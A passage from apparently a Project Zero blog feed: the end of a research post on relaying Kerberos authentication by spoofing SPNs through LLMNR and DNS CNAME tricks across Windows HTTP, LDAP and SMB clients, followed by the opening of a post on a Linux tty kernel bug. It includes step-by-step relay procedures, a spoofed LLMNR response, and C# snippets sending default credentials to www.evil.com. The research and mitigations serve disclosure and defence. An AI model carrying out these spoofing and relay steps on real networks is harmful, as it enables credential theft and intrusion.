In theory only NTLM and Negotiate are defined but a HTTP implementation could use other Windows authentication packages such as Kerberos if it so chose to. Whether the HTTP client will automatically use the user's credentials is up to the user agent or the developer using it as a library.

All the major browsers support both authentication types as well as many non browser HTTP user agents such as those in .NET and WinHTTP. I looked at the following implementations, all running on Windows 10 21H1:

  • WinINET (Internet Explorer 11)
  • WinHTTP (WebClient)
  • Chromium M93 (Chrome and Edge)
  • Firefox 91
  • .NET Framework 4.8
  • .NET 5.0 and 6.0

This is of course not an exhaustive list, and there's likely to be many different HTTP clients in Windows which might have different behaviors. I've also not looked at how non-Windows clients work in this regard.

There's two important behaviors that I wanted to assess with HTTP. First is how the user agent determines when to perform automatic Windows authentication using the current user's credentials. In order to relay the authentication it can't ask the user for their credentials. And second we want to know how the SPN is selected by the user agent when calling InitializeSecurityContext.

WinINET (Internet Explorer 11)

WinINET can be used as a generic library to handle HTTP connections and authentication. There's likely many different users of WinINET but we'll just look at Internet Explorer 11 as that is what it's most known for. WinINET is also the originator of HTTP Negotiate authentication, so it's good to get a baseline of what WinINET does in case other libraries just copied its behavior.

First, how does WinINET determine when it should handle Windows authentication automatically? By default this is based on whether the target host is considered to be in the Intranet Zone. This means any host which bypasses the configured HTTP proxy or uses an undotted name will be considered Intranet zone and WinINET will automatically authenticate using the current user's credentials.

It's possible to disable this behavior by changing the security options for the Intranet Zone to "Prompt for user name and password", as shown below:

Screenshot of the system Internet Options Security Settings showing how to disable automatic authentication

Next, how does WinINET determine the SPN to use for Negotiate authentication? RFC4559 says the following:

'When the Kerberos Version 5 GSSAPI mechanism [RFC4121] is being used, the HTTP server will be using a principal name of the form of "HTTP/hostname"'

You might assume therefore that the HTTP URL that WinINET is connecting to would be sufficient to build the SPN: just use the hostname as provided and combine with the HTTP service class. However it turns out that's not entirely the case. I found a rough description of how IE and WinINET actually generate the SPN in this blog. This blog post is over 10 years old so it was possible that things have changed, however it turns out to not be the case.

The basic approach is that WinINET doesn't necessarily trust the hostname specified in the HTTP URL. Instead it requests the canonical name of the server via DNS. It doesn't seem to explicitly request a CNAME record from the DNS server. Instead it calls getaddrinfo and specifies the AI_CANONNAME hint. Then it uses the returned value of ai_canonname and prefixes it with the HTTP service class. In general ai_canonname is the name provided by the DNS server in the returned A/AAAA record.

For example, if the HTTP URL is http://fileserver.domain.com, but the DNS A record contains the canonical name example.domain.com the generated SPN is HTTP/example.domain.com and not HTTP/fileserver.domain.com. Therefore to provide an arbitrary SPN you need to get the name in the DNS address record to differ from the IP address in that record so that IE will connect to a server we control while generating Kerberos authentication for a different target name.

The most obvious technique would be to specify a DNS CNAME record which redirects to another hostname. However, at least if the client is using a Microsoft DNS server (which is likely for a domain environment) then the CNAME record is not directly returned to the client. Instead the DNS server will perform a recursive lookup, and then return the CNAME along with the validated address record to the client.

Therefore, if an attacker sets up a CNAME record for www.evil.com, which redirects to fileserver.domain.com the DNS server will return the CNAME record and an address record for the real IP address of fileserver.domain.com. WinINET will try to connect to the HTTP service on fileserver.domain.com rather than www.evil.com which is what is needed for the attack to function.

I tried various ways of tricking the DNS client into making a direct request to a DNS server I controlled but I couldn't seem to get it to work. However, it turns out there is a way to get the DNS resolver to accept arbitrary DNS responses, via local DNS resolution protocols such as Multicast DNS (MDNS) and Link-Local Multicast Name Resolution (LLMNR).

These two protocols use a lightly modified DNS packet structure, so you can return a response to the name resolution request with an address record with the IP address of the malicious web server, but the canonical name of any server. WinINET will then make the HTTP connection to the malicious web server but construct the SPN for the spoofed canonical name. I've verified this with LLMNR and in theory MDNS should work as well.

Is spoofing the canonical name a bug in the Windows DNS client resolver? I don't believe any DNS protocol requires the query name to exactly match the answer name. If the DNS server has a CNAME record for the queried host then there's no obvious requirement for it to return that record when it could just return the address record. Of course if a public DNS server could spoof a host for a DNS zone which it didn't control, that'd be a serious security issue. It's also worth noting that this doesn't spoof the name generally. As the cached DNS entry on Windows is based on the query name, if the client now resolves fileserver.domain.com a new DNS request will be made and the DNS server would return the real address.

Attacking local name resolution protocols is a well known weakness abused for MitM attacks, so it's likely that some security conscious networks will disable the protocols. However, the advantage of using LLMNR this way over its use for MitM is that the resolved name can be anything. As in, normally you'd want to spoof the DNS name of an existing host, in our example you'd spoof the request for the fileserver name. But for registered computers on the network the DNS client will usually satisfy the name resolution via the network's DNS server before ever trying local DNS resolution. Therefore local DNS resolution would never be triggered and it wouldn't be possible to spoof it. For relaying Kerberos authentication we don't care, you can induce a client to connect to an unregistered host name which will fallback to local DNS resolution.

The big problem with the local DNS resolution attack vector is that the attacker must be in the same multicast domain as the victim computer. However, the attacker can still start the process by getting a user to connect to an external domain which looks legitimate then redirect to an undotted name to both force automatic authentication and local DNS resolving.

Diagram of the local DNS resolving attack against WinINET

To summarize the attack process as shown in the above diagram:

  1. The attacker sets up an LLMNR service on a machine in the same multicast domain at the victim computer. The attacker listens for a target name request such as EVILHOST.
  2. Trick the victim to use IE (or another WinINET client, such as via a document format like DOCX) to connect to the attacker's server on http://EVILHOST.
  3. The LLMNR server receives the lookup request and responds by setting the address record's hostname to the SPN target host to spoof and the IP address to the attacker-controlled server.
  4. The WinINET client extracts the spoofed canonical name, appends the HTTP service class to the SPN and requests the Kerberos service ticket. This Kerberos ticket is then sent to the attacker's HTTP service.
  5. The attacker receives the Negotiate/Kerberos authentication for the spoofed SPN and relays it to the real target server.

An example LLMNR response decoded by Wireshark for the name evilhost (with IP address 10.0.0.80), spoofing fileserver.domain.com (which is not address 10.0.0.80) is shown below:

Link-local Multicast Name Resolution (response)

    Transaction ID: 0x910f

    Flags: 0x8000 Standard query response, No error

    Questions: 1

    Answer RRs: 1

    Authority RRs: 0

    Additional RRs: 0

    Queries

        evilhost: type A, class IN

            Name: evilhost

            [Name Length: 8]

            [Label Count: 1]

            Type: A (Host Address) (1)

            Class: IN (0x0001)

    Answers

        fileserver.domain.com: type A, class IN, addr 10.0.0.80

            Name: fileserver.domain.com

            Type: A (Host Address) (1)

            Class: IN (0x0001)

            Time to live: 1 (1 second)

            Data length: 4

            Address: 10.0.0.80

You might assume that the SPN always having the HTTP service class would be a problem. However, the Active Directory default SPN mapping will map HTTP to the HOST service class which is always registered. Therefore you can target any domain joined system without needing to register an explicit SPN. As long as the receiving service doesn't then verify the SPN it will work to authenticate to the computer account, which is used by privileged services. You can use the following PowerShell script to list all the configured SPN mappings in a domain.

PS> $base_dn = (Get-ADRootDSE).configurationNamingContext

PS> $dn = "CN=Directory Service,CN=Windows NT,CN=Services,$base_dn"

PS> (Get-ADObject $dn -Properties sPNMappings).sPNMappings

One interesting behavior of WinINET is that it always requests Kerberos delegation, although that will only be useful if the SPN's target account is registered for delegation. I couldn't convince WinINET to default to a Kerberos only mode; sending back a WWW-Authenticate: Kerberos header causes the authentication process to stop. This means the Kerberos AP_REQ will always have Integrity enabled even though the user agent doesn't explicitly request it.

Another user of WinINET is Office. For example you can set a template located on an HTTP URL which will generate local Windows authentication if in the Intranet zone just by opening a Word document. This is probably a good vector for getting the authentication started rather than relying on Internet Explorer being available.

WinINET does have some feature controls which can be enabled on a per-executable basis which affect the behavior of the SPN lookup process, specifically FEATURE_USE_CNAME_FOR_SPN_KB911149 and

FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771. However these only seem to come into play if the HTTP connection is being proxied, which we're assuming isn't the case.

WinHTTP (WebDAV WebClient)

The WinHTTP library is an alternative to using WinINET in a client application. It's a cleaner API and doesn't have the baggage of being used in Internet Explorer. As an example client I chose to use the built-in WebDAV WebClient service because it gives the interesting property that it converts a UNC file name request into a potentially exploitable HTTP request. If the WebClient service is installed and running then opening a file of the form \\EVIL\abc will cause an HTTP request to be sent out to a server under the attacker's control.

From what I can tell the behavior of WinHTTP when used with the WebClient service is almost exactly the same as for WinINET. I could exploit the SPN generation through local DNS resolution, but not from a public DNS name record. WebDAV seems to consider undotted names to be Intranet zone, however the default for WinHTTP seems to depend on whether the connection would bypass the proxy. The automatic authentication decision is based on the value of the WINHTTP_OPTION_AUTOLOGON_POLICY policy.

At least as used with WebDAV WinHTTP handles a WWW-Authenticate header of Kerberos, however it ends up using the Negotiate package regardless and so Integrity will always be enabled. It also enables Kerberos delegation automatically like WinINET.

Chromium M93

Chromium based browsers such as Chrome and Edge are open source so it's a bit easier to check the implementation. By default Chromium will automatically authenticate to intranet zone sites, it uses the same Internet Security Manager used by WinINET to make the zone determination in URLSecurityManagerWin::CanUseDefaultCredentials. An administrator can set GPOs to change this behavior to only allow automatic authentication to a set of hosts.

The SPN is generated in HttpAuthHandlerNegotiate::CreateSPN which is called from HttpAuthHandlerNegotiate::DoResolveCanonicalNameComplete. While the documentation for CreateSPN mentions it's basically a copy of the behavior in IE, it technically isn't. Instead of taking the canonical name from the initial DNS request it does a second DNS request, and the result of that is used to generate the SPN.

This second DNS request is important as it means that we now have a way of exploiting this from a public DNS name. If you set the TTL of the initial host DNS record to a very low value, then it's possible to change the DNS response between the lookup for the host to connect to and the lookup for the canonical name to use for the SPN.

This will also work with local DNS resolution as well, though in that case the response doesn't need to be switched as one response is sufficient. This second DNS lookup behavior can be disabled with a GPO. If this is disabled then neither local DNS resolution nor public DNS will work as Chromium will use the host specified in the URL for the SPN.

In a domain environment where the Chromium browser is configured to only authenticate to Intranet sites we can abuse the fact that by default authenticated users can add new DNS records to the Microsoft DNS server through LDAP (see this blog post by Kevin Robertson). Using the domain's DNS server is useful as the DNS record could be looked up using a short Intranet name rather than a public DNS name meaning it's likely to be considered a target for automatic authentication.

One problem with using LDAP to add the DNS record is the time before the DNS server will refresh its records is at least 180 seconds. This would make it difficult to switch the response from a normal address record to a CNAME record in a short enough time frame to be useful. Instead we can add an NS record to the DNS server which forwards the lookup to our own DNS server. As long as the TTL for the DNS response is short the domain's DNS server will rerequest the record and we can return different responses without any waiting for the DNS server to update from LDAP. This is very similar to DNS rebinding attack, except instead of swapping the IP address, we're swapping the canonical name.

Diagram of two DNS request attack against Chromium

Therefore a working exploit as shown in the diagram would be the following:

  1. Register an NS record with the DNS server for evilhost.domain.com using existing authenticated credentials via LDAP. Wait for the DNS server to pick up the record.
  2. Direct the browser to connect to http://evilhost. This allows Chromium to automatically authenticate as it's an undotted Intranet host. The browser will lookup evilhost.domain.com by adding its primary DNS suffix.
  3. This request goes to the client's DNS server, which then follows the NS record and performs a recursive query to the attacker's DNS server.
  4. The attacker's DNS server returns a normal address record for their HTTP server with a very short TTL.
  5. The browser makes a request to the HTTP server, at this point the attacker delays the response long enough for the cached DNS request to expire. It can then return a 401 to get the browser to authenticate.
  6. The browser makes a second DNS lookup for the canonical name. As the original request has expired, another will be made for evilhost.domain.com. For this lookup the attacker returns a CNAME record for the fileserver.domain.com target. The client's DNS server will look up the IP address for the CNAME host and return that.
  7. The browser will generate the SPN based on the CNAME record and that'll be used to generate the AP_REQ, sending it to the attacker's HTTP server.
  8. The attacker can relay the AP_REQ to the target server.

It's possible that we can combine the local and public DNS attack mechanisms to only need one DNS request. In this case we could set up an NS record to our own DNS server and get the client to resolve the hostname. The client's DNS server would do a recursive query, and at this point our DNS server shouldn't respond immediately. We could then start a classic DNS spoofing attack to return a DNS response packet directly to the client with the spoofed address record.

In general DNS spoofing is limited by requiring the source IP address, transaction ID and the UDP source port to match before the DNS client will accept the response packet. The source IP address should be spoofable on a local network and the client's IP address can be known ahead of time through an initial HTTP connection, so the only problems are the transaction ID and port.

As most clients have a relatively long timeout of 3-5 seconds, that might be enough time to try the majority of the combinations for the ID and port. Of course there isn't really a penalty for trying multiple times. If this attack was practical then you could do the attack on a local network even if local DNS resolution was disabled and enable the attack for libraries which only do a single lookup such as WinINET and WinHTTP. The response could have a long TTL, so that when the access is successful it doesn't need to be repeated for every request.

I couldn't get Chromium to downgrade Negotiate to Kerberos only so Integrity will be enabled. Also since Delegation is not enabled by default, an administrator needs to configure an allow list GPO to specify what targets are allowed to receive delegated credentials.

A bonus quirk for Chromium: It seems to be the only browser which still supports URL based user credentials. If you pass user credentials in the request and get the server to return a request for Negotiate authentication then it'll authenticate automatically regardless of the zone of the site. You can also pass credentials using XMLHttpRequest::open.

While not very practical, this can be used to test a user's password from an arbitrary host. If the username/password is correct and the SPN is spoofed then Chromium will send a validated Kerberos AP_REQ, otherwise either NTLM or no authentication will be sent.

NTLM can be always generated as it doesn't require any proof the password is valid, whereas Kerberos requires the password to be correct to allow the authentication to succeed. You need to specify the domain name when authenticating so you use a URL of the form http://DOMAIN%5CUSER:[email protected].

One other quirk of this is you can specify a fully qualified domain name (FQDN) and user name and the Windows Kerberos implementation will try and authenticate using that server based on the DNS SRV records. For example http://EVIL.COM%5CUSER:[email protected] will try to authenticate to the Kerberos service specified through the _kerberos._tcp.evil.com SRV record. This trick works even on non-domain joined systems to generate Kerberos authentication, however it's not clear if this trick has any practical use.

It's worth noting that I did discuss the implications of the Chromium HTTP vector with team members internally and the general conclusion that this behavior is by design as it's trying to copy the behavior expected of existing user agents such as IE. Therefore there was no expectation it would be fixed.

Firefox 91

As with Chromium, Firefox is open source so we can find the implementation. Unlike the other HTTP implementations researched up to this point, Firefox doesn't perform Windows authentication by default. An administrator needs to configure either a list of hosts that are allowed to automatically authenticate, or the network.negotiate-auth.allow-non-fqdn setting can be enabled to authenticate to non-dotted host names.

If authentication is enabled it works with both local DNS resolving and public DNS as it does a second DNS lookup when constructing the SPN for Negotiate in nsAuthSSPI::MakeSN. Unlike Chromium there doesn't seem to be a setting to disable this behavior.

Once again I couldn't get Firefox to use raw Kerberos, so Integrity is enabled. Also Delegation is not enabled unless an administrator configures the network.negotiate-auth.delegation-uris setting.

.NET Framework 4.8

The .NET Framework 4.8 officially has two HTTP libraries, the original System.Net.HttpWebRequest and derived APIs and the newer System.Net.Http.HttpClient API. However in the .NET framework the newer API uses the older one under the hood, so we'll only consider the older of the two.

Windows authentication is only generated automatically if the UseDefaultCredentials property is set to true on the HttpWebRequest object as shown below (technically this sets the CredentialCache.DefaultCredentials object, but it's easier to use the boolean property). Once the default credentials are set the client will automatically authenticate using Windows authentication to any host, it doesn't seem to care if that host is in the Intranet zone.

var request = WebRequest.CreateHttp("http://www.evil.com");

request.UseDefaultCredentials = true;

var response = (HttpWebResponse)request.GetResponse();

The SPN is generated in the System.Net.AuthenticationState.GetComputeSpn function which we can find in the .NET reference source. The SPN is built from the canonical name returned by the initial DNS lookup, which means it supports the local but not public DNS resolution. If you follow the code it does support doing a second DNS lookup if the host is undotted, however this is only if the client code sets an explicit Host header as far as I can tell. Note that the code here is slightly different in .NET 2.0 which might support looking up the canonical name as long as the host name is undotted, but I've not verified that.

The .NET Framework supports specifying Kerberos directly as the authentication type in the WWW-Authentication header. As the client code doesn't explicitly request integrity, this allows the Kerberos AP_REQ to not have Integrity enabled.

The code also supports the WWW-Authentication header having an initial token, so even if Kerberos wasn't directly supported, you could use Negotiate and specify the stub token I described at the start to force Kerberos authentication. For example returning the following header with the initial 401 status response will force Kerberos through auto-detection:

WWW-Authenticate: Negotiate AAFA

Finally, the authentication code always enables delegation regardless of the target host.

.NET 5.0

The .NET 5.0 runtime has deprecated the HttpWebRequest API in favor of the HttpClient API. It uses a new backend class called the SocketsHttpHandler. As it's all open source we can find the implementation, specifically the AuthenticationHelper class which is a complete rewrite from the .NET Framework version.

To automatically authenticate, the client code must either use the HttpClientHandler class and set the UseDefaultCredentials property as shown below. Or if using SocketsHttpHandler, set the Credentials property to the default credentials. This handler must then be specified when creating the HttpClient object.

var handler = new HttpClientHandler();

handler.UseDefaultCredentials = true;

var client = new HttpClient(handler);

await client.GetStringAsync("http://www.evil.com");

Unless the client specified an explicit Host header in the request the authentication will do a DNS lookup for the canonical name. This is separate from the DNS lookup for the HTTP connection so it supports both local and public DNS attacks.

While the implementation doesn't support Kerberos directly like the .NET Framework, it does support passing an initial token so it's still possible to force raw Kerberos which will disable the Integrity requirement.

.NET 6.0

The .NET 6.0 runtime is basically the same as .NET 5.0, except that Integrity is specified explicitly when creating the client authentication context. This means that rolling back to Kerberos no longer has any advantage. This change seems to be down to a broken implementation of NTLM on macOS and not as some anti-NTLM relay measure.

HTTP Overview

The following table summarizes the results of the HTTP protocol research:

  • The LLMNR column indicates it's possible to influence the SPN using a local DNS resolver attack
  • DNS CNAME indicates a public DNS resolving attack
  • Delegation indicates the HTTP user agent enables Kerberos delegation
  • Integrity indicates that integrity protection is requested which reduces the usefulness of the relayed authentication if the target server automatically detects the setting.

User Agent

LLMNR

DNS CNAME

Delegation

Integrity

Internet Explorer 11 (WinINET)

Yes

No

Yes

Yes

WebDAV (WinHTTP)

Yes

No

Yes

Yes

Chromium (M93)

Yes

Yes

No

Yes

Firefox 91

Yes

Yes

No

Yes

.NET Framework 4.8

Yes

No

Yes

No

.NET 5.0

Yes

Yes

No

No

.NET 6.0

Yes

Yes

No

Yes

† Chromium and Firefox can enable delegation only on a per-site basis through a GPO.

‡ .NET Framework supports DNS resolving in special circumstances for non-dotted hostnames.

By far the most permissive client is .NET 5.0. It supports authenticating to any host as long as it has been configured to authenticate automatically. It also supports arbitrary SPN spoofing from a public DNS name as well as disabling integrity through Kerberos fallback. However, as .NET 5.0 is designed to be something usable cross platform, it's possible that few libraries written with it in mind will ever enable automatic authentication.

LDAP

Windows has a built-in general purpose LDAP library in wldap32.dll. This is used by the majority of OS components when accessing Active Directory and is also used by the .NET LdapConnection class. There doesn't seem to be a way of specifying the SPN manually for the LDAP connection using the API. Instead it's built manually based on the canonical name based on the DNS lookup. Therefore it's exploitable in a similar manner to WinINET via local DNS resolution.

The name of the LDAP server can also be found by querying for a SRV record for the hostname. This is used to support accessing the LDAP server from the top-level Windows domain name. This will usually return an address record alongside, all this does is change the server resolution process which doesn't seem to give any advantages to exploitation.

Whether the LDAP client enables integrity checking is based on the value of the LDAP_OPT_SIGN flag. As the connection only supports Negotiate authentication the client passes the ISC_REQ_NO_INTEGRITY flag if signing is disabled so that the server won't accidentally auto-detect the signing capability enabled for the Negotiate MIC and accidentally enable signing protection.

As part of recent changes to LDAP signing the client is forced to enable Integrity by the LdapClientIntegrity policy. This means that regardless of whether the LDAP server needs integrity protection it'll be enabled on the client which in turn will automatically enable it on the server. Changing the value of LDAP_OPT_SIGN in the client has no effect once this policy is enabled.

SMB

SMB is one of the most commonly exploited protocols for NTLM relay, as it's easy to convert access to a file into authentication. It would be convenient if it was also exploitable for Kerberos relay. While SMBv1 is deprecated and not even installed on newer installs of Windows, it's still worth looking at the implementation of v1 and v2 to determine if either are exploitable.

The client implementations of SMB 1 and 2 are in mrxsmb10.sys and mrxsmb20.sys respectively with some common code in mrxsmb.sys. Both protocols support specifying a name for the SPN which is related to DFS. The SPN name needs to be specified through the GUID_ECP_DOMAIN_SERVICE_NAME_CONTEXT ECP and is only enabled if the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag in the GUID_ECP_NETWORK_OPEN_CONTEXT ECP (set by MUP) is specified. This is related to UNC hardening which was added to protect things like group policies.

It's easy enough to trigger the conditions to set the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag. The default UNC hardening rules always add SYSVOL and NETLOGON UNC paths with a wildcard hostname. Therefore a request to \\evil.com\SYSVOL will cause the flag to be set and the SPN potentially overridable. The server should be a DFS server for this to work, however even with the flag set I've not found a way of setting an arbitrary SPN value remotely.

Even if you could spoof the SPN, the SMB clients always enable Integrity protection. Like LDAP, SMB will enable signing and encryption opportunistically if available from the client, unless UNC hardening measures are in place.

Marshaled Target Information SPN

While investigating the SMB implementation I noticed something interesting. The SMB clients use the function SecMakeSPNEx2 to build the SPN value from the service class and name. You might assume this would just return the SPN as-is, however that's not the case. Instead for the hostname of fileserver with the service class cifs you get back an SPN which looks like the following:

cifs/fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA

Looking at the implementation of SecMakeSPNEx2 it makes a call to the API function CredMarshalTargetInfo. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure and marshals it using a base64 string encoding. This marshaled string is then appended to the end of the real SPN.

The code is therefore just appending some additional target information to the end of the SPN, presumably so it's easier to pass around. My initial assumption would be this information is stripped off before passing to the SSPI APIs by the SMB client. However, passing this SPN value to InitializeSecurityContext as the target name succeeds and gets a Kerberos service ticket for cifs/fileserver. How does that work?

Inside the function SspiExProcessSecurityContext in lsasrv.dll, which is the main entrypoint of InitializeSecurityContext, there's a call to the CredUnmarshalTargetInfo API, which parses the marshaled target information. However SspiExProcessSecurityContext doesn't care about the unmarshalled results, instead it just gets the length of the marshaled data and removes that from the end of the target SPN string. Therefore before the Kerberos package gets the target name it has already been restored to the original SPN.

The encoded SPN shown earlier, minus the service class, is a valid DNS component name and therefore could be used as the hostname in a public or local DNS resolution request. This is interesting as this potentially gives a way of spoofing a hostname which is distinct from the real target service, but when processed by the SSPI API requests the spoofed service ticket. As in if you use the string fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA as the DNS name, and if the client appends a service class to the name and passes it to SSPI it will get a service ticket for fileserver, however the DNS resolving can trivially return an unrelated IP address.

There are some big limitations to abusing this behavior. The marshaled target information must be valid, the last 6 characters is an encoded length of the entire marshaled buffer and the buffer is prefixed with a 28 byte header with a magic value of 0x91856535 in the first 4 bytes. If this length is invalid (e.g. larger than the buffer or not a multiple of 2) or the magic isn't present then the CredUnmarshalTargetInfo call fails and SspiExProcessSecurityContext leaves the SPN as is which will subsequently fail to query a Kerberos ticket for the SPN.

The easiest way that the name could be invalid is by it being converted to lowercase. DNS is case insensitive, however generally the servers are case preserving. Therefore you could lookup the case sensitive name and the DNS server would return that unmodified. However the HTTP clients tested all seem to lowercase the hostname before use, therefore by the time it's used to build an SPN it's now a different string. When unmarshalling 'a' and 'A' represent different binary values and so parsing of the marshaled information will fail.

Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters so as long as there's an SPN for that shorter name registered it should be sufficient. However if there's no short SPN name registered then it's going to be more difficult to exploit.

In theory you could specify the SPN using its FQDN. However it's hard to construct such a name. The length value must be at the end of the string and needs to be a valid marshaled value so you can't have any dots within its 6 characters. It's possible to have a TLD which is 6 characters or longer and as the embedded marshaled values are not escaped this can be used to construct a valid FQDN which would then resolve to another SPN target. For example:

fileserver1UWhRCAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAA.domain.oBAAAA

is a valid DNS name which would resolve to an SPN for fileserver. Except that oBAAAA is not a valid public TLD. Pulling the list of valid TLDs from ICANN's website and converting all values which are 6 characters or longer into the expected length value, the smallest length which is a multiple of 2 is from WEBCAM which results in a DNS name at least 264331 characters long, which is somewhat above the 255 character limit usually considered valid for a FQDN in DNS.

Therefore this would still be limited to more local attacks and only for limited sets of protocols. For example an authenticated user could register a DNS entry for the local domain using this value and trick an RPC client to connect to it using its undotted hostname. As long as the client doesn't modify the name other than putting the service class on it (or it gets automatically generated by the RPC runtime) then this spoofs the SPN for the request.

Microsoft's Response to the Research

I didn't initially start looking at Kerberos authentication relay, as mentioned I found it inadvertently when looking at IPsec and AuthIP which I subsequently reported to Microsoft. After doing more research into other network protocols I decided to use the AuthIP issue as a bellwether on Microsoft's views on whether relaying Kerberos authentication and spoofing SPNs would cross a security boundary.

As I mentioned earlier the AuthIP issue was classed as "vNext", which denotes it might be fixed in a future version of Windows, but not as a security update for any currently shipping version of Windows. This was because Microsoft determined it to be a Moderate severity issue (see this for the explanation of the severities). Only Important or above will be serviced.

It seems that the general rule is that any network protocol where the SPN can be spoofed to generate Kerberos authentication which can be relayed, is not sufficient to meet the severity level for a fix. However, any network facing service which can be used to induce authentication where the attacker does not have existing network authentication credentials is considered an Important severity spoofing issue and will be fixed. This is why PetitPotam was fixed as CVE-2021-36942, as it could be exploited from an unauthenticated user.

As my research focused entirely on the network protocols themselves and not the ways of inducing authentication, they will all be covered under the same Moderate severity. This means that if they were to be fixed at all, it'd be in unspecified future versions of Windows.

Available Mitigations

How can you defend yourself against authentication relay attacks presented in this blog post? While I think I've made the case that it's possible to relay Kerberos authentication, it's somewhat more limited in scope than NTLM relay. This means that disabling NTLM is still an invaluable option for mitigating authentication relay issues on a Windows enterprise network.

Also, except for disabling NTLM, all the mitigations for NTLM relay apply to Kerberos relay. Requiring signing or sealing on the protocol if possible is sufficient to prevent the majority of attack vectors, especially on important network services such as LDAP.

For TLS encapsulated protocols, channel binding prevents the authentication being relayed as I didn't find any way of spoofing the TLS certificate at the same time. If the network service supports EPA, such as HTTPS or LDAPS it should be enabled. Even if the protocol doesn't support EPA, enabling TLS protection if possible is still valuable. This not only provides more robust server authentication, which Kerberos mutual authentication doesn't really provide, it'll also hide Kerberos authentication tokens from sniffing or MitM attacks.

Some libraries, such as WinHTTP and .NET set the undocumented ISC_REQ_UNVERIFIED_TARGET_NAME request attribute when calling InitializeSecurityContext in certain circumstances. This affects the behavior of the server when querying for the SPN used during authentication. Some servers such as SMB and IIS with EPA can be configured to validate the SPN. If this request attribute flag is set then while the authentication will succeed when the server goes to check the SPN, it gets an empty string which will not match the server's expectations. If you're a developer you should use this flag if the SPN has been provided from an untrustworthy source, although this will only be beneficial if the server is checking the received SPN.

A common thread through the research is abusing local DNS resolution to spoof the SPN. Disabling LLMNR and MDNS should always be best practice, and this just highlights the dangers of leaving them enabled. While it might be possible to perform the same attacks through DNS spoofing attacks, these are likely to be much less reliable than local DNS spoofing attacks.

If Windows authentication isn't needed from a network client, it'd be wise to disable it if supported. For example, some HTTP user agents support disabling automatic Windows authentication entirely, while others such as Firefox don't enable it by default. Chromium also supports disabling the DNS lookup process for generating the SPN through group policy.

Finally, blocking untrusted devices on the network such as through 802.1X or requiring authenticated IPsec/IKEv2 for all network communications to high value services would go some way to limiting the impact of all authentication relay attacks. Although of course, an attacker could still compromise a trusted host and use that to mount the attack.

Conclusions

I hope that this blog post has demonstrated that Kerberos relay attacks are feasible and just disabling NTLM is not a sufficient mitigation strategy in an enterprise environment. While DNS is a common thread and is the root cause of the majority of these protocol issues, it's still possible to spoof SPNs using other protocols such as AuthIP and MSRPC without needing to play DNS tricks.

While I wrote my own tooling to perform the LLMNR attack there are various public tools which can mount an LLMNR and MDNS spoofing attack such as the venerable Python Responder. It shouldn't be hard to modify one of the tools to verify my findings.

I've also not investigated every possible network protocol which might perform Kerberos authentication. I've also not looked at non-Windows systems which might support Kerberos such as Linux and macOS. It's possible that in more heterogeneous networks the impact might be more pronounced as some of the security changes in Microsoft's Kerberos implementation might not be present.

If you're doing your own research into this area, you should look at how the SPN is specified by the protocol, but also how the implementation builds it. For example the HTTP Negotiate RFC states how to build the SPN for Kerberos, but then each implementation does it slightly differently and not to the RFC specification.

You should be especially wary of any protocol where an untrusted server can specify an arbitrary SPN. This is the case in AuthIP, MSRPC and DCOM. It's almost certain that when these protocols were originally designed many years ago, that no thought was given to the possible abuse of this design for relaying the Kerberos network authentication.

How a simple Linux kernel memory corruption bug can lead to complete system compromise

By: Ryan
19 October 2021 at 16:08

An analysis of current and potential kernel security mitigations

Posted by Jann Horn, Project Zero

Introduction

This blog post describes a straightforward Linux kernel locking bug and how I exploited it against Debian Buster's 4.19.0-13-amd64 kernel. Based on that, it explores options for security mitigations that could prevent or hinder exploitation of issues similar to this one.

I hope that stepping through such an exploit and sharing this compiled knowledge with the wider security community can help with reasoning about the relative utility of various mitigation approaches.

A lot of the individual exploitation techniques and mitigation options that I am describing here aren't novel. However, I believe that there is value in writing them up together to show how various mitigations interact with a fairly normal use-after-free exploit.

Our bugtracker entry for this bug, along with the proof of concept, is at https://bugs.chromium.org/p/project-zero/issues/detail?id=2125.

Code snippets in this blog post that are relevant to the exploit are taken from the upstream 4.19.160 release, since that is what the targeted Debian kernel is based on; some other code snippets are from mainline Linux.

(In case you're wondering why the bug and the targeted Debian kernel are from end of last year: I already wrote most of this blogpost around April, but only recently finished it)

I would like to thank Ryan Hileman for a discussion we had a while back about how static analysis might fit into static prevention of security bugs (but note that Ryan hasn't reviewed this post and doesn't necessarily agree with any of my opinions). I also want to thank Kees Cook for providing feedback on an earlier version of this post (again, without implying that he necessarily agrees with everything), and my Project Zero colleagues for reviewing this post and frequent discussions about exploit mitigations.

Background for the bug

On Linux, terminal devices (such as a serial console or a virtual console) are represented by a struct tty_struct. Among other things, this structure contains fields used for the job control features of terminals, which are usually modified using a set of ioctls:

struct tty_struct {
[...]
        spinlock_t ctrl_lock;
[...]
        struct pid *pgrp;               /* Protected by ctrl lock */
        struct pid *session;
[...]
        struct tty_struct *link;
[...]
}[...];

The pgrp field points to the foreground process group of the terminal (normally modified from userspace via the TIOCSPGRP ioctl); the session field points to the session associated with the terminal. Both of these fields do not point directly to a process/task, but rather to a struct pid. struct pid ties a specific incarnation of a numeric ID to a set of processes that use that ID as their PID (also known in userspace as TID), TGID (also known in userspace as PID), PGID, or SID. You can kind of think of it as a weak reference to a process, although that's not entirely accurate. (There's some extra nuance around struct pid when execve() is called by a non-leader thread, but that's irrelevant here.)

All processes that are running inside a terminal and are subject to its job control refer to that terminal as their "controlling terminal" (stored in ->signal->tty of the process).

A special type of terminal device are pseudoterminals, which are used when you, for example, open a terminal application in a graphical environment or connect to a remote machine via SSH. While other terminal devices are connected to some sort of hardware, both ends of a pseudoterminal are controlled by userspace, and pseudoterminals can be freely created by (unprivileged) userspace. Every time /dev/ptmx (short for "pseudoterminal multiplexor") is opened, the resulting file descriptor represents the device side (referred to in documentation and kernel sources as "the pseudoterminal master") of a new pseudoterminal . You can read from it to get the data that should be printed on the emulated screen, and write to it to emulate keyboard inputs. The corresponding terminal device (to which you'd usually connect a shell) is automatically created by the kernel under /dev/pts/<number>.

